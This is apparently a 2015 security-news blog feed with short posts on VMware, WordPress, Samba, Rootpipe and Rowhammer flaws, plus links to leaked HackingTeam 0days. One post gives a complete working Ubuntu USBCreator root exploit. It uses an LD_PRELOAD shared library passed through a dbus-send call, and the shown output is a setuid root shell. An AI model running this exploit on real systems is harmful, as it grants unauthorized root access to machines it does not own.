VMware Privilege Escalation

by admin

Friday, July 10th, 2015 at 9:56 pm

The products affected by the privilege escalation vulnerability are: ‘VMware Workstation’, ‘Horizon Client’ (with Local Mode Option), and ‘Player’. VMware Workstation, Player and Horizon View Client for Windows do not set a discretionary access control list (DACL) for one of their processes. This may allow a local attacker to elevate their privileges and execute code in the security context of the affected process. More info ::HERE::.

Second HackingTeam Flash 0day

by admin

Friday, July 10th, 2015 at 6:04 pm

make it rain ::HERE::

HackingTeam 0days

by admin

Friday, July 10th, 2015 at 1:22 pm

Two 0days were in the release from the HackingTeam dump. one for flash and one for win8.1 32bit. Get them ::HERE:: and ::HERE::

Update your WordPress

by admin

Monday, April 27th, 2015 at 2:25 pm

WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen. It allows an attacker to inject code into the HTML content received by administrators who maintain the website. Recommended that you update to WordPress 4.2.1.
::Source::

Tesla Motors pwned.

by admin

Saturday, April 25th, 2015 at 4:26 pm

http://teslamotors.com and their twitter got owned today
tesla

whoever had control of the twitter mistakenly posted a screenshot of their skype session

the site is currently down.

Priv Escalation in Ubuntu USBCreator service

by admin

Thursday, April 23rd, 2015 at 9:40 am

On Ubuntu and need to escalate to root and don’t have sudo?

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,”foo”,XAUTHORITY,”foo”,LD_PRELOAD,”/tmp/test.so”
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id

::Source::

Mac OS X “Rootpipe” Privilege Escalation

by admin

Monday, April 13th, 2015 at 2:00 pm

The Admin framework in Apple OS X contains a hidden backdoor API Privilege Escalation to root privileges. It’s been there for several years (at least since 2011). Metasploit has added the POC module to their repo Mac OS X “Rootpipe” Users who aren’t running “yosemite” are shit out of luck so far, Apple had no plans to fix.
More info:truesecdev.wordpress.com

Hammer Time.

by admin

Monday, March 9th, 2015 at 2:36 pm

HammerTime
“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows.
More info: Exploiting the DRAM rowhammer bug to gain kernel privileges

Kali on Raspberry Pi 2

by admin

Monday, February 23rd, 2015 at 12:49 pm

pi 2
cyberkryption has finished getting a build for Kali Linux 1.1.10 for a Raspberry Pi 2 with working XFCE and raspi-config
Check out his blog for more info: cyberkryption.wordpress.com

Samba vulnerability (CVE-2015-0240)

by admin

Monday, February 23rd, 2015 at 11:29 am

CVE-2015-0240 is a security flaw in the smbd file server daemon. It can be exploited by a malicious Samba client, by sending specially-crafted packets to the Samba server. No authenticated is required to exploit this flaw. It can result in remotely controlled execution of arbitrary code as root.

more info: https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

IP: Loading... - Host: Loading...
IP Geolocation: unknown.

We love our country, but fear our government.